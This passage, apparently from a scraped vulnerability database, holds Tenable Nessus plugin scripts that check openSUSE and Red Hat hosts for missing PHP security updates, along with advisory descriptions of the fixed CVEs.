script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"apache2-mod_php5-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bcmath-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bz2-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-calendar-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ctype-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-curl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dba-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dbase-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-devel-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dom-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-exif-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-fastcgi-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ftp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gd-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gettext-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gmp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-hash-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-iconv-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-imap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-json-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ldap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mbstring-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mcrypt-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mysql-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ncurses-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-odbc-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-openssl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pcntl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pdo-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pear-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pgsql-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-posix-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pspell-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-readline-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-shmop-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-snmp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-soap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sockets-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sqlite-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-suhosin-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvmsg-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvsem-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvshm-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tidy-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tokenizer-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-wddx-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlreader-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlrpc-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlwriter-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xsl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zip-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zlib-5.2.9-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:11:34", "bulletinFamily": "scanner", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate function of the gd extension potentially allowed attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to other virtual hosts on th same machine (CVE-2009-0754).", "modified": "2016-12-22T00:00:00", "id": "SUSE_APACHE2-MOD_PHP5-6068.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36079", "published": "2009-04-03T00:00:00", "title": "openSUSE 10 Security Update : apache2-mod_php5 (apache2-mod_php5-6068)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-6068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36079);\n script_version (\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:45 $\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE 10 Security Update : apache2-mod_php5 (apache2-mod_php5-6068)\");\n script_summary(english:\"Check for the apache2-mod_php5-6068 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"apache2-mod_php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-bcmath-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-bz2-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-calendar-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ctype-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-curl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dba-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dbase-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-devel-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dom-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-exif-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-fastcgi-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ftp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gd-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gettext-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-hash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-iconv-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-imap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-json-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ldap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mbstring-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mcrypt-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mhash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mysql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ncurses-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-odbc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-openssl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pcntl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pdo-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pear-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pgsql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-posix-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pspell-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-readline-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-shmop-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-snmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-soap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sockets-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sqlite-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-suhosin-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvmsg-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvsem-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvshm-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-tidy-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-tokenizer-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-wddx-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlreader-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlrpc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlwriter-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xsl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-zip-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-zlib-5.2.9-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:11:34", "bulletinFamily": "scanner", "description": "Updated php packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A remote attacker able to pass arbitrary input to a PHP script using mbstring conversion functions could cause the PHP interpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload' configuration setting. A value set for one virtual host, or in a user's .htaccess file, was incorrectly applied to other virtual hosts on the same server, causing the handling of multibyte character strings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP script allowed a remote attacker to load a carefully crafted font file, it could cause the PHP interpreter to crash or, possibly, execute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when running in FastCGI mode. If the PHP interpreter was being executed via FastCGI, a remote attacker could create a request which would cause the PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate function. A remote attacker able to pass arbitrary values as the 'background color' argument of the function could, possibly, view portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which contain backported patches to resolve these issues. The httpd web server must be restarted for the changes to take effect.", "modified": "2018-11-27T00:00:00", "id": "REDHAT-RHSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36097", "published": "2009-04-07T00:00:00", "title": "RHEL 3 / 4 : php (RHSA-2009:0337)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0337. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36097);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/11/27 13:31:32\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2009:0337)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3658\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0337\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n 